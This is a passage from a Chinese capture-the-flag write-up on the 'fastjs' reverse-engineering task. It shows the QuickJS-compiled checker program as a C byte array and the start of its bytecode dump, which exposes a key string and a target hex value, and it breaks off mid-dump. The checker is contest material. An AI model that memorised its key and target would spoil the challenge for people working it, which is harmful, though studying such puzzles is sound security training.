第四届“强网”拟态防御国际精英挑战赛_wp
本文为合天网安实验室原创,转载请注明注明出处!
Re
1、fastjs
提取字节码
/* File generated automatically by the QuickJS compiler. */ #include "quickjs-libc.h" const uint32_t qjsc_hello_size = 2269; const uint8_t qjsc_hello[2269] = { 0x02, 0x3A, 0x10, 0x6C, 0x6F, 0x6E, 0x67, 0x32, 0x73, 0x74, 0x72, 0x10, 0x73, 0x74, 0x72, 0x32, 0x6C, 0x6F, 0x6E, 0x67, 0x10, 0x73, 0x64, 0x66, 0x73, 0x66, 0x73, 0x64, 0x66, 0x0E, 0x73, 0x74, 0x72, 0x32, 0x48, 0x65, 0x78, 0x0E, 0x68, 0x65, 0x78, 0x32, 0x73, 0x74, 0x72, 0x0C, 0x78, 0x78, 0x78, 0x66, 0x73, 0x73, 0x08, 0x6D, 0x61, 0x69, 0x6E, 0x08, 0x61, 0x72, 0x67, 0x73, 0x82, 0x01, 0x41, 0x42, 0x43, 0x44, 0x45, 0x46, 0x47, 0x48, 0x49, 0x4A, 0x4B, 0x4C, 0x4D, 0x4E, 0x4F, 0x50, 0x51, 0x52, 0x53, 0x54, 0x55, 0x56, 0x57, 0x58, 0x59, 0x5A, 0x61, 0x62, 0x63, 0x64, 0x65, 0x66, 0x67, 0x68, 0x69, 0x6A, 0x6B, 0x6C, 0x6D, 0x6E, 0x6F, 0x70, 0x71, 0x72, 0x73, 0x74, 0x75, 0x76, 0x77, 0x78, 0x79, 0x7A, 0x30, 0x31, 0x32, 0x33, 0x34, 0x35, 0x36, 0x37, 0x38, 0x39, 0x2B, 0x2F, 0x3D, 0x0E, 0x5F, 0x6B, 0x65, 0x79, 0x53, 0x74, 0x72, 0x0A, 0x64, 0x66, 0x73, 0x66, 0x73, 0x14, 0x73, 0x63, 0x72, 0x69, 0x70, 0x74, 0x41, 0x72, 0x67, 0x73, 0x0A, 0x73, 0x68, 0x69, 0x66, 0x74, 0x0A, 0x65, 0x72, 0x72, 0x6F, 0x72, 0x20, 0x2E, 0x2F, 0x74, 0x65, 0x73, 0x74, 0x5F, 0x65, 0x6E, 0x63, 0x6F, 0x64, 0x65, 0x2E, 0x6A, 0x73, 0x02, 0x76, 0x02, 0x77, 0x04, 0x76, 0x6C, 0x04, 0x73, 0x6C, 0x02, 0x69, 0x18, 0x66, 0x72, 0x6F, 0x6D, 0x43, 0x68, 0x61, 0x72, 0x43, 0x6F, 0x64, 0x65, 0x12, 0x73, 0x75, 0x62, 0x73, 0x74, 0x72, 0x69, 0x6E, 0x67, 0x02, 0x73, 0x06, 0x6C, 0x65, 0x6E, 0x14, 0x63, 0x68, 0x61, 0x72, 0x43, 0x6F, 0x64, 0x65, 0x41, 0x74, 0x06, 0x73, 0x74, 0x72, 0x06, 0x6B, 0x65, 0x79, 0x02, 0x6B, 0x02, 0x6E, 0x02, 0x7A, 0x02, 0x79, 0x0A, 0x64, 0x65, 0x6C, 0x74, 0x61, 0x04, 0x6D, 0x78, 0x02, 0x65, 0x02, 0x71, 0x06, 0x73, 0x75, 0x6D, 0x02, 0x70, 0x0A, 0x66, 0x6C, 0x6F, 0x6F, 0x72, 0x0C, 0x6F, 0x75, 0x74, 0x70, 0x75, 0x74, 0x08, 0x63, 0x68, 0x72, 0x31, 0x10, 0x70, 0x61, 0x72, 0x73, 0x65, 0x49, 0x6E, 0x74, 0x0C, 0x73, 0x75, 0x62, 0x73, 0x74, 0x72, 0x08, 0x63, 0x68, 0x72, 0x32, 0x08, 0x63, 0x68, 0x72, 0x33, 0x08, 0x65, 0x6E, 0x63, 0x31, 0x08, 0x65, 0x6E, 0x63, 0x32, 0x08, 0x65, 0x6E, 0x63, 0x33, 0x08, 0x65, 0x6E, 0x63, 0x34, 0x0A, 0x69, 0x73, 0x4E, 0x61, 0x4E, 0x0C, 0x63, 0x68, 0x61, 0x72, 0x41, 0x74, 0x12, 0x64, 0x66, 0x73, 0x66, 0x64, 0x73, 0x66, 0x73, 0x64, 0x0C, 0x66, 0x77, 0x64, 0x65, 0x72, 0x66, 0x0A, 0x70, 0x72, 0x69, 0x6E, 0x74, 0x18, 0x79, 0x6F, 0x75, 0x72, 0x20, 0x69, 0x6E, 0x70, 0x75, 0x74, 0x3A, 0x20, 0x20, 0x6E, 0x6F, 0x5F, 0x74, 0x68, 0x69, 0x6E, 0x67, 0x5F, 0x69, 0x73, 0x5F, 0x74, 0x72, 0x75, 0x65, 0x0E, 0x64, 0x66, 0x64, 0x66, 0x77, 0x66, 0x33, 0xE0, 0x01, 0x30, 0x35, 0x61, 0x65, 0x64, 0x30, 0x63, 0x65, 0x34, 0x34, 0x31, 0x66, 0x38, 0x30, 0x62, 0x35, 0x62, 0x63, 0x33, 0x36, 0x61, 0x66, 0x34, 0x63, 0x36, 0x39, 0x38, 0x35, 0x30, 0x39, 0x66, 0x63, 0x36, 0x63, 0x63, 0x33, 0x63, 0x39, 0x37, 0x31, 0x34, 0x36, 0x33, 0x35, 0x33, 0x64, 0x65, 0x35, 0x61, 0x39, 0x35, 0x63, 0x36, 0x61, 0x62, 0x65, 0x61, 0x30, 0x37, 0x66, 0x64, 0x34, 0x61, 0x37, 0x30, 0x37, 0x30, 0x39, 0x33, 0x32, 0x64, 0x38, 0x36, 0x61, 0x63, 0x33, 0x32, 0x64, 0x36, 0x32, 0x38, 0x36, 0x37, 0x32, 0x61, 0x35, 0x39, 0x31, 0x32, 0x33, 0x65, 0x35, 0x39, 0x37, 0x32, 0x33, 0x33, 0x31, 0x64, 0x62, 0x35, 0x64, 0x66, 0x66, 0x65, 0x37, 0x30, 0x35, 0x37, 0x33, 0x36, 0x32, 0x06, 0x79, 0x65, 0x73, 0x0E, 0x00, 0x06, 0x00, 0xA0, 0x01, 0x00, 0x01, 0x00, 0x03, 0x00, 0x08, 0xE4, 0x01, 0x01, 0xA2, 0x01, 0x00, 0x00, 0x00, 0x3F, 0xE1, 0x00, 0x00, 0x00, 0x40, 0x3F, 0xE2, 0x00, 0x00, 0x00, 0x40, 0x3F, 0xE3, 0x00, 0x00, 0x00, 0x40, 0x3F, 0xE4, 0x00, 0x00, 0x00, 0x40, 0x3F, 0xE5, 0x00, 0x00, 0x00, 0x40, 0x3F, 0xE6, 0x00, 0x00, 0x00, 0x40, 0x3F, 0xE7, 0x00, 0x00, 0x00, 0x40, 0x3F, 0xE8, 0x00, 0x00, 0x00, 0x00, 0xC0, 0x00, 0x40, 0xE1, 0x00, 0x00, 0x00, 0x00, 0xC0, 0x01, 0x40, 0xE2, 0x00, 0x00, 0x00, 0x00, 0xC0, 0x02, 0x40, 0xE3, 0x00, 0x00, 0x00, 0x00, 0xC0, 0x03, 0x40, 0xE4, 0x00, 0x00, 0x00, 0x00, 0xC0, 0x04, 0x40, 0xE5, 0x00, 0x00, 0x00, 0x00, 0xC0, 0x05, 0x40, 0xE6, 0x00, 0x00, 0x00, 0x00, 0xC0, 0x07, 0x40, 0xE7, 0x00, 0x00, 0x00, 0x00, 0x3E, 0xE8, 0x00, 0x00, 0x00, 0x00, 0x38, 0xE6, 0x00, 0x00, 0x00, 0x04, 0xE9, 0x00, 0x00, 0x00, 0x15, 0x43, 0xEA, 0x00, 0x00, 0x00, 0xC9, 0x38, 0xE6, 0x00, 0x00, 0x00, 0xC0, 0x06, 0x15, 0x43, 0xEB, 0x00, 0x00, 0x00, 0xC9, 0x06, 0xC9, 0x37, 0xEC, 0x00, 0x00, 0x00, 0xF4, 0xEB, 0x1D, 0x38, 0xEC, 0x00, 0x00, 0x00, 0x11, 0x39, 0xE8, 0x00, 0x00, 0x00, 0xC9, 0x38, 0xE8, 0x00, 0x00, 0x00, 0x42, 0xED, 0x00, 0x00, 0x00, 0x24, 0x00, 0x00, 0xC9, 0xEC, 0x25, 0x06, 0xC9, 0x37, 0x4D, 0x00, 0x00, 0x00, 0xF4, 0xEB, 0x0F, 0x38, 0x4D, 0x00, 0x00, 0x00, 0x11, 0x39, 0xE8, 0x00, 0x00, 0x00, 0xC9, 0xEC, 0x0D, 0x04, 0xEE, 0x00, 0x00, 0x00, 0x11, 0x39, 0xE8, 0x00, 0x00, 0x00, 0xC9, 0x38, 0xE7, 0x00, 0x00, 0x00, 0x38, 0xE8, 0x00, 0x00, 0x00, 0xEF, 0xCD, 0x28, 0xDE, 0x03, 0x01, 0x13, 0xF1, 0x00, 0x3E, 0xB0, 0x01, 0x58, 0x00, 0x05, 0x36, 0x00, 0x09, 0x40, 0x35, 0x3F, 0x49, 0x3F, 0x3F, 0x0D, 0x41, 0x0E, 0x43, 0x06, 0x00, 0xC2, 0x03, 0x02, 0x03, 0x02, 0x09, 0x00, 0x01, 0x6E, 0x05, 0xE0, 0x03, 0x00, 0x01, 0x00, 0xE2, 0x03, 0x00, 0x01, 0x00, 0xE4, 0x03, 0x00, 0x00, 0x00, 0xE6, 0x03, 0x00, 0x01, 0x00, 0xE8, 0x03, 0x00, 0x02, 0x00, 0xD1, 0xE9, 0xC9, 0xD1, 0xC5, 0xB6, 0x9E, 0x47, 0xBF, 0x00, 0xAD, 0xCA, 0xB5, 0xCB, 0xC7, 0xC5, 0xA3, 0xEA, 0x3B, 0xD1, 0xC7, 0x71, 0x38, 0x99, 0x00, 0x00, 0x00, 0x42, 0xF5, 0x00, 0x00, 0x00, 0xD1, 0xC7, 0x47, 0xBE, 0xFF, 0x00, 0xAD, 0xD1, 0xC7, 0x47, 0xBD, 0x08, 0xA2, 0xBE, 0xFF, 0x00, 0xAD, 0xD1, 0xC7, 0x47, 0xBD, 0x10, 0xA2, 0xBE, 0xFF, 0x00, 0xAD, 0xD1, 0xC7, 0x47, 0xBD, 0x18, 0xA2, 0xBE, 0xFF, 0x00, 0xAD, 0x24, 0x04, 0x00, 0x49, 0x93, 0x02, 0xEC, 0xC2, 0xD2, 0xEA, 0x15, 0xD1, 0x42, 0x5B, 0x00, 0x00, 0x00, 0xC1, 0x24, 0x01, 0x00, 0x42, 0xF6, 0x00, 0x00, 0x00, 0xB5, 0xC6, 0x25, 0x02, 0x00, 0xD1, 0x42, 0x5B, 0x00, 0x00, 0x00, 0xC1, 0x25, 0x01, 0x00, 0xDE, 0x03, 0x01, 0x0B, 0x03, 0x12, 0x30, 0x27, 0x67, 0x35, 0x35, 0x49, 0x17, 0x12, 0x69, 0x06, 0x00, 0x00, 0xE0, 0xFF, 0xFF, 0xFF, 0xEF, 0x41, 0x0E, 0x43, 0x06, 0x00, 0xC4, 0x03, 0x02, 0x03, 0x02, 0x07, 0x00, 0x00, 0x5D, 0x05, 0xEE, 0x03, 0x00, 0x01, 0x00, 0xE2, 0x03, 0x00, 0x01, 0x00, 0xF0, 0x03, 0x00, 0x00, 0x00, 0xE0, 0x03, 0x00, 0x01, 0x00, 0xE8, 0x03, 0x00, 0x02, 0x00, 0xD1, 0xE9, 0xC9, 0x26, 0x00, 0x00, 0xCA, 0xB5, 0xCB, 0xC7, 0xC5, 0xA3, 0xEA, 0x46, 0xC6, 0xC7, 0xB7, 0xA1, 0x71, 0xD1, 0x42, 0xF9, 0x00, 0x00, 0x00, 0xC7, 0x24, 0x01, 0x00, 0xD1, 0x42, 0xF9, 0x00, 0x00, 0x00, 0xC7, 0xB6, 0x9D, 0x24, 0x01, 0x00, 0xBD, 0x08, 0xA0, 0xAF, 0xD1, 0x42, 0xF9, 0x00, 0x00, 0x00, 0xC7, 0xB7, 0x9D, 0x24, 0x01, 0x00, 0xBD, 0x10, 0xA0, 0xAF, 0xD1, 0x42, 0xF9, 0x00, 0x00, 0x00, 0xC7, 0xB8, 0x9D, 0x24, 0x01, 0x00, 0xBD, 0x18, 0xA0, 0xAF, 0x49, 0xB9, 0x94, 0x02, 0xEC, 0xB7, 0xD2, 0xEA, 0x06, 0xC6, 0xC6, 0xE9, 0xC5, 0x49, 0xC6, 0x28, 0xDE, 0x03, 0x13, 0x0B, 0x03, 0x12, 0x17, 0x27, 0x4E, 0x53, 0x53, 0x58, 0x1C, 0x12, 0x1D, 0x0E, 0x43, 0x06, 0x00, 0xC6, 0x03, 0x02, 0x0B, 0x02, 0x06, 0x00, 0x04, 0xF8, 0x01, 0x0D, 0xF4, 0x03, 0x00, 0x01, 0x00, 0xF6, 0x03, 0x00, 0x01, 0x00, 0xE0, 0x03, 0x00, 0x00, 0x00, 0xF8, 0x03, 0x00, 0x01, 0x00, 0xFA, 0x03, 0x00, 0x02, 0x00, 0xFC, 0x03, 0x00, 0x03, 0x00, 0xFE, 0x03, 0x00, 0x04, 0x00, 0x80, 0x04, 0x00, 0x05, 0x00, 0x82, 0x04, 0x00, 0x06, 0x00, 0x84, 0x04, 0x00, 0x07, 0x00, 0x86, 0x04, 0x00, 0x08, 0x00, 0x88, 0x04, 0x00, 0x09, 0x00, 0x8A, 0x04, 0x00, 0x0A, 0x00, 0xD1, 0xC1, 0xA9, 0xEA, 0x03, 0xC1, 0x28, 0x38, 0xE2, 0x00, 0x00, 0x00, 0xD1, 0x0A, 0xF0, 0xC9, 0x38, 0xE2, 0x00, 0x00, 0x00, 0xD2, 0x09, 0xF0, 0xCA, 0xC5, 0xE9, 0xB6, 0x9E, 0xCB, 0xC5, 0xC7, 0x47, 0xCC, 0xC5, 0xB5, 0x47, 0xC3, 0x04, 0xBF, 0x00, 0xC3, 0x05, 0x38, 0x9D, 0x00, 0x00, 0x00, 0x42, 0x06, 0x01, 0x00, 0x00, 0xBB, 0xBD, 0x34, 0xC7, 0xB6, 0x9D, 0x9B, 0x9D, 0x24, 0x01, 0x00, 0xC3, 0x08, 0xB5, 0xC3, 0x09, 0xC2, 0x08, 0x90, 0xC3, 0x08, 0xB5, 0xA5, 0x69, 0x9B, 0x00, 0x00, 0x00, 0xC2, 0x09, 0xC2, 0x05, 0x9D, 0xBF, 0x01, 0xAD, 0xC4, 0x09, 0xB7, 0xA2, 0xB8, 0xAD, 0xC3, 0x07, 0xB5, 0xC3, 0x0A, 0xC2, 0x0A, 0xC7, 0xA3, 0xEA, 0x43, 0xC5, 0xC2, 0x0A, 0xB6, 0x9D, 0x47, 0xC3, 0x04, 0xC8, 0xBA, 0xA2, 0xC2, 0x04, 0xB7, 0xA0, 0xAE, 0xC2, 0x04, 0xB8, 0xA2, 0xC8, 0xB9, 0xA0, 0xAE, 0x9D, 0xC2, 0x09, 0xC2, 0x04, 0xAE, 0xC6, 0xC2, 0x0A, 0xB8, 0xAD, 0xC2, 0x07, 0xAE, 0x47, 0xC8, 0xAE, 0x9D, 0xAE, 0xC3, 0x06, 0xC5, 0xC2, 0x0A, 0x71, 0xC5, 0xC2, 0x0A, 0x47, 0xC2, 0x06, 0x9D, 0xBF, 0x02, 0xAD, 0x16, 0x49, 0xCC, 0x93, 0x0A, 0xEC, 0xB9, 0xC5, 0xB5, 0x47, 0xC3, 0x04, 0xC8, 0xBA, 0xA2, 0xC2, 0x04, 0xB7, 0xA0, 0xAE, 0xC2, 0x04, 0xB8, 0xA2, 0xC8, 0xB9, 0xA0, 0xAE, 0x9D, 0xC2, 0x09, 0xC2, 0x04, 0xAE, 0xC6, 0xC2, 0x0A, 0xB8, 0xAD, 0xC2, 0x07, 0xAE, 0x47, 0xC8, 0xAE, 0x9D, 0xAE, 0xC3, 0x06, 0xC5, 0xC7, 0x71, 0xC5, 0xC7, 0x47, 0xC2, 0x06, 0x9D, 0xBF, 0x03, 0xAD, 0x16, 0x49, 0xCC, 0xED, 0x5F, 0xFF, 0x38, 0xE4, 0x00, 0x00, 0x00, 0x38, 0xE1, 0x00, 0x00, 0x00, 0xC5, 0x09, 0xF0, 0x23, 0x01, 0x00, 0xDE, 0x03, 0x23, 0x15, 0x03, 0x1C, 0x08, 0x08, 0x30, 0x30, 0x1D, 0x44, 0x85, 0x3F, 0x35, 0x21, 0x30, 0x2B, 0xBC, 0x58, 0x17, 0x1C, 0xBC, 0x4E, 0x13, 0x06, 0x00, 0x00, 0x20, 0x37, 0xEF, 0xC6, 0xE3, 0x41, 0x06, 0x00, 0x00, 0xE0, 0xFF, 0xFF, 0xFF, 0xEF, 0x41, 0x06, 0x00, 0x00, 0xE0, 0xFF, 0xFF, 0xFF, 0xEF, 0x41, 0x06, 0x00, 0x00, 0xE0, 0xFF, 0xFF, 0xFF, 0xEF, 0x41, 0x0E, 0x43, 0x06, 0x00, 0xC8, 0x03, 0x01, 0x03, 0x01, 0x04, 0x00, 0x01, 0x32, 0x04, 0xB0, 0x01, 0x00, 0x01, 0x00, 0x8E, 0x04, 0x00, 0x00, 0x00, 0x90, 0x04, 0x00, 0x01, 0x00, 0xE8, 0x03, 0x00, 0x02, 0x00, 0xC1, 0xC9, 0xC1, 0xCA, 0xB5, 0xCB, 0xD1, 0x42, 0xF9, 0x00, 0x00, 0x00, 0xC7, 0x91, 0xCB, 0x24, 0x01, 0x00, 0x42, 0x37, 0x00, 0x00, 0x00, 0xBD, 0x10, 0x24, 0x01, 0x00, 0xCE, 0xE9, 0xB6, 0xA9, 0xEA, 0x06, 0xBF, 0x00, 0xC6, 0x9D, 0xCA, 0xC6, 0x94, 0x00, 0xC7, 0xD1, 0xE9, 0xA3, 0xEB, 0xD7, 0xC5, 0x28, 0xDE, 0x03, 0x3E, 0x08, 0x03, 0x0D, 0x0D, 0x0E, 0x76, 0x35, 0x12, 0x21, 0x07, 0x02, 0x30, 0x0E, 0x43, 0x06, 0x00, 0xCA, 0x03, 0x01, 0x03, 0x01, 0x06, 0x00, 0x00, 0x52, 0x04, 0xB0, 0x01, 0x00, 0x01, 0x00, 0x8E, 0x04, 0x00, 0x00, 0x00, 0xE8, 0x03, 0x00, 0x01, 0x00, 0xF8, 0x03, 0x00, 0x02, 0x00, 0xC1, 0xC9, 0xB5, 0xCA, 0xC6, 0xD1, 0xE9, 0xA3, 0xEA, 0x47, 0x38, 0x09, 0x01, 0x00, 0x00, 0xD1, 0x42, 0x0A, 0x01, 0x00, 0x00, 0xC6, 0xB6, 0x24, 0x02, 0x00, 0xBD, 0x10, 0xF0, 0xB9, 0xA0, 0x38, 0x09, 0x01, 0x00, 0x00, 0xD1, 0x42, 0x0A, 0x01, 0x00, 0x00, 0xC6, 0x8F, 0xCE, 0xB6, 0x24, 0x02, 0x00, 0xBD, 0x10, 0xF0, 0xAF, 0xCF, 0xBE, 0xFF, 0x00, 0xAD, 0xCB, 0xC5, 0x38, 0x99, 0x00, 0x00, 0x00, 0x42, 0xF5, 0x00, 0x00, 0x00, 0xC7, 0x24, 0x01, 0x00, 0x9D, 0xC9, 0x93, 0x01, 0xEC, 0xB5, 0xC5, 0x28, 0xDE, 0x03, 0x4A, 0x09, 0x03, 0x0D, 0x0D, 0x21, 0xDA, 0x21, 0x58, 0x0D, 0x0D, 0x0E, 0x43, 0x06, 0x00, 0xCC, 0x03, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x29, 0xDE, 0x03, 0x56, 0x01, 0x03, 0x0E, 0x43, 0x06, 0x00, 0x00, 0x01, 0x09, 0x01, 0x04, 0x00, 0x00, 0xE6, 0x01, 0x0A, 0xB0, 0x01, 0x00, 0x01, 0x00, 0x8E, 0x04, 0x00, 0x00, 0x00, 0x90, 0x04, 0x00, 0x01, 0x00, 0x96, 0x04, 0x00, 0x02, 0x00, 0x98, 0x04, 0x00, 0x03, 0x00, 0x9A, 0x04, 0x00, 0x04, 0x00, 0x9C, 0x04, 0x00, 0x05, 0x00, 0x9E, 0x04, 0x00, 0x06, 0x00, 0xA0, 0x04, 0x00, 0x07, 0x00, 0xE8, 0x03, 0x00, 0x08, 0x00, 0xC1, 0xC9, 0xC1, 0xCC, 0xC1, 0xC3, 0x07, 0xB5, 0xC3, 0x08, 0xD1, 0x42, 0xF9, 0x00, 0x00, 0x00, 0xC2, 0x08, 0x91, 0xC3, 0x08, 0x24, 0x01, 0x00, 0xCA, 0xD1, 0x42, 0xF9, 0x00, 0x00, 0x00, 0xC2, 0x08, 0x91, 0xC3, 0x08, 0x24, 0x01, 0x00, 0xCB, 0xD1, 0x42, 0xF9, 0x00, 0x00, 0x00, 0xC2, 0x08, 0x91, 0xC3, 0x08, 0x24, 0x01, 0x00, 0xCC, 0xC6, 0xB7, 0xA1, 0xC3, 0x04, 0xC6, 0xB8, 0xAD, 0xB9, 0xA0, 0xC7, 0xB9, 0xA1, 0xAF, 0xC3, 0x05, 0xC7, 0xBD, 0x0F, 0xAD, 0xB7, 0xA0, 0xC8, 0xBB, 0xA1, 0xAF, 0xC3, 0x06, 0xC8, 0xBD, 0x3F, 0xAD, 0xC3, 0x07, 0x38, 0x11, 0x01, 0x00, 0x00, 0xC7, 0xEF, 0xEA, 0x09, 0xBD, 0x40, 0xC4, 0x07, 0xC3, 0x06, 0xEC, 0x0E, 0x38, 0x11, 0x01, 0x00, 0x00, 0xC8, 0xEF, 0xEA, 0x05, 0xBD, 0x40, 0xC3, 0x07, 0xC5, 0x38, 0xE6, 0x00, 0x00, 0x00, 0x41, 0xEA, 0x00, 0x00, 0x00, 0x42, 0x12, 0x01, 0x00, 0x00, 0xC2, 0x04, 0x24, 0x01, 0x00, 0x9D, 0x38, 0xE6, 0x00, 0x00, 0x00, 0x41, 0xEA, 0x00, 0x00, 0x00, 0x42, 0x12, 0x01, 0x00, 0x00, 0xC2, 0x05, 0x24, 0x01, 0x00, 0x9D, 0x38, 0xE6, 0x00, 0x00, 0x00, 0x41, 0xEA, 0x00, 0x00, 0x00, 0x42, 0x12, 0x01, 0x00, 0x00, 0xC2, 0x06, 0x24, 0x01, 0x00, 0x9D, 0x38, 0xE6, 0x00, 0x00, 0x00, 0x41, 0xEA, 0x00, 0x00, 0x00, 0x42, 0x12, 0x01, 0x00, 0x00, 0xC2, 0x07, 0x24, 0x01, 0x00, 0x9D, 0xC9, 0xC1, 0xD0, 0xCF, 0xCA, 0xC1, 0xC4, 0x07, 0xC4, 0x06, 0xC4, 0x05, 0xC3, 0x04, 0xC2, 0x08, 0xD1, 0xE9, 0xA3, 0x6A, 0x2A, 0xFF, 0xFF, 0xFF, 0xC5, 0x28, 0xDE, 0x03, 0x59, 0x18, 0x03, 0x0D, 0x0D, 0x12, 0x13, 0x4E, 0x4E, 0x4E, 0x1C, 0x3A, 0x3F, 0x21, 0x30, 0x21, 0x3A, 0x18, 0x08, 0x6C, 0x6C, 0x6C, 0x71, 0x17, 0x30, 0x35, 0x0E, 0x43, 0x06, 0x00, 0xCE, 0x03, 0x01, 0x04, 0x01, 0x04, 0x00, 0x00, 0x84, 0x01, 0x05, 0xD0, 0x03, 0x00, 0x01, 0x00, 0xB0, 0x01, 0x00, 0x00, 0x00, 0xA6, 0x04, 0x00, 0x01, 0x00, 0xA8, 0x04, 0x00, 0x02, 0x00, 0xAC, 0x01, 0x00, 0x03, 0x00, 0xD1, 0xE9, 0xB6, 0xA3, 0xEA, 0x0D, 0x38, 0x15, 0x01, 0x00, 0x00, 0x04, 0xEE, 0x00, 0x00, 0x00, 0xEF, 0x29, 0x38, 0x15, 0x01, 0x00, 0x00, 0x04, 0x16, 0x01, 0x00, 0x00, 0xD1, 0xB5, 0x47, 0x9D, 0xEF, 0x0E, 0xD1, 0xB5, 0x47, 0xC9, 0x38, 0xE6, 0x00, 0x00, 0x00, 0x42, 0xEB, 0x00, 0x00, 0x00, 0xC5, 0x24, 0x01, 0x00, 0xCA, 0x04, 0x17, 0x01, 0x00, 0x00, 0x11, 0x39, 0x18, 0x01, 0x00, 0x00, 0x0E, 0x38, 0xE3, 0x00, 0x00, 0x00, 0xC6, 0x38, 0x18, 0x01, 0x00, 0x00, 0xF0, 0xCF, 0xE9, 0xBD, 0x70, 0xAA, 0xEA, 0x0D, 0x38, 0x15, 0x01, 0x00, 0x00, 0x04, 0xEE, 0x00, 0x00, 0x00, 0xEF, 0x29, 0x04, 0x19, 0x01, 0x00, 0x00, 0xCC, 0xC7, 0xC8, 0xA9, 0xEA, 0x0E, 0x38, 0x15, 0x01, 0x00, 0x00, 0x04, 0x1A, 0x01, 0x00, 0x00, 0xEF, 0x0E, 0x29, 0x38, 0x15, 0x01, 0x00, 0x00, 0x04, 0xEE, 0x00, 0x00, 0x00, 0xEF, 0x29, 0xDE, 0x03, 0x76, 0x11, 0x03, 0x21, 0x3B, 0x08, 0x54, 0x17, 0x4F, 0x3F, 0x40, 0x26, 0x3B, 0x09, 0x21, 0x1D, 0x3F, 0x09, 0x3C }; static JSContext *JS_NewCustomContext(JSRuntime *rt) { JSContext *ctx = JS_NewContextRaw(rt); if (!ctx) return NULL; JS_AddIntrinsicBaseObjects(ctx); return ctx; } int main(int argc, char **argv) { JSRuntime *rt; JSContext *ctx; rt = JS_NewRuntime(); js_std_set_worker_new_context_func(JS_NewCustomContext); js_std_init_handlers(rt); ctx = JS_NewCustomContext(rt); js_std_add_helpers(ctx, argc, argv); js_std_eval_binary(ctx, qjsc_hello, qjsc_hello_size, 0); js_std_loop(ctx); JS_FreeContext(ctx); JS_FreeRuntime(rt); return 0; }
编译dump出bytecode
0000: 02 3a 58 atom indexes { 1"long2str" 1"str2long" 1"sdfsfsdf" 1"str2Hex" 1"hex2str" 1"xxxfss" 1"main" 1"args" 1"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=" 1"_keyStr" 1"dfsfs" 1"scriptArgs" 1"shift" 1"error" 1"./test_encode.js" 1"v" 1"w" 1"vl" 1"sl" 1"i" 1"fromCharCode" 1"substring" 1"s" 1"len" 1"charCodeAt" 1"str" 1"key" 1"k" 1"n" 1"z" 1"y" 1"delta" 1"mx" 1"e" 1"q" 1"sum" 1"p" 1"floor" 1"output" 1"chr1" 1"parseInt" 1"substr" 1"chr2" 1"chr3" 1"enc1" 1"enc2" 1"enc3" 1"enc4" 1"isNaN" 1"charAt" 1"dfsfdsfsd" 1"fwderf" 1"print" 1"your input: " 1"no_thing_is_true" 1"dfdfwf3" 1"05aed0ce441f80b5bc36af4c698509fc6cc3c97146353de5a95c6abea07fd4a7070932d86ac32d628672a59123e5972331db5dffe7057362" 1"yes" 0002: 10 6c 6f 6e 67 32 73 74 72 10 73 74 72 32 6c 6f 6e 67 10 73 64 66 73 66 73 64 66 0e 73 74 72 32 48 65 78 0e 68 65 78 32 73 74 72 0c 78 78 78 66 73 73 08 6d 61 69 6e 08 61 72 67 73 82 01 41 42 43 44 45 46 47 48 49 4a 4b 4c 4d 4e 4f 50 51 52 53 54 55 56 57 58 59 5a 61 62 63 64 65 66 67 68 69 6a 6b 6c 6d 6e 6f 70 71 72 73 74 75 76 77 78 79 7a 30 31 32 33 34 35 36 37 38 39 2b 2f 3d 0e 5f 6b 65 79 53 74 72 0a 64 66 73 66 73 14 73 63 72 69 70 74 41 72 67 73 0a 73 68 69 66 74 0a 65 72 72 6f 72 20 2e 2f 74 65 73 74 5f 65 6e 63 6f 64 65 2e 6a 73 02 76 02 77 04 76 6c 04 73 6c 02 69 18 66 72 6f 6d 43 68 61 72 43 6f 64 65 12 73 75 62 73 74 72 69 6e 67 02 73 06 6c 65 6e 14 63 68 61 72 43 6f 64 65 41 74 06 73 74 72 06 6b 65 79 02 6b 02 6e 02 7a 02 79 0a 64 65 6c 74 61 04 6d 78 02 65 02 71 06 73 75 6d 02 70 0a 66 6c 6f 6f 72 0c 6f 75 74 70 75 74 08 63 68 72 31 10 70 61 72 73 65 49 6e 74 0c 73 75 62 73 74 72 08 63 68 72 32 08 63 68 72 33 08 65 6e 63 31 08 65 6e 63 32 08 65 6e 63 33 08 65 6e 63 34 0a 69 73 4e 61 4e 0c 63 68 61 72 41 74 12 64 66 73 66 64 73 66 73 64 0c 66 77 64 65 72 66 0a 70 72 69 6e 74 18 79 6f 75 72 20 69 6e 70 75 74 3a 20 20 6e 6f 5f 74 68 69 6e 67 5f 69 73 5f 74 72 75 65 0e 64 66 64 66 77 66 33 e0 01 30 35 61 65 64 30 63 65 34 34 31 66 38 30 62 35 62 63 33 36 61 66 34 63 36 39 38 35 30 39 66 63 36 63 63 33 63 39 37 31 34 36 33 35 33 64 65 35 61 39 35 63 36 61 62 65 61 30 37 66 64 34 61 37 30 37 30 39 33 32 64 38 36 61 63 33 32 64 36 32 38 36 37 32 61 35 39 31 32 33 65 35 39 37 32 33 33 31 64 62 35 64 66 66 65 37 30 35 37 33 36 32 06 79 65 73 } 020e: 0e function { 020f: 00 06 00 a0 01 00 01 00 03 00 08 e4 01 01 name: "<eval>" args=0 vars=1 defargs=0 closures=0 cpool=8 stack=3 bclen=228 locals=1 vars { 021d: a2 01 00 00 00 name: "<ret>" } bytecode { 0222: 3f e1 00 00 00 40 3f e2 00 00 00 40 3f e3 00 00 00 40 3f e4 00 00 00 40 3f e5 00 00 00 40 3f e6 00 00 00 40 3f e7 00 00 00 40 3f e8 00 00 00 00 c0 00 40 e1 00 00 00 00 c0 01 40 e2 00 00 00 00 c0 02 40 e3 00 00 00 00 c0 03 40 e4 00 00 00 00 c0 04 40 e5 00 00 00 00 c0 05 40 e6 00 00 00 00 c0 07 40 e7 00 00 00 00 3e e8 00 00 00 00 38 e6 00 00 00 04 e9 00 00 00 15 43 ea 00 00 00 c9 38 e6 00 00 00 c0 06 15 43 eb 00 00 00 c9 06 c9 37 ec 00 00 00 f4 eb 1d 38 ec 00 00 00 11 39 e8 00 00 00 c9 38 e8 00 00 00 42 ed 00 00 00 24 00 00 c9 ec 25 06 c9 37 4d 00 00 00 f4 eb 0f 38 4d 00 00 00 11 39 e8 00 00 00 c9 ec 0d 04 ee 00 00 00 11 39 e8 00 00 00 c9 38 e7 00 00 00 38 e8 00 00 00 ef cd 28 at 1, fixup atom: long2str at 7, fixup atom: str2long at 13, fixup atom: sdfsfsdf at 19, fixup atom: str2Hex at 25, fixup atom: hex2str at 31, fixup atom: xxxfss at 37, fixup atom: main at 43, 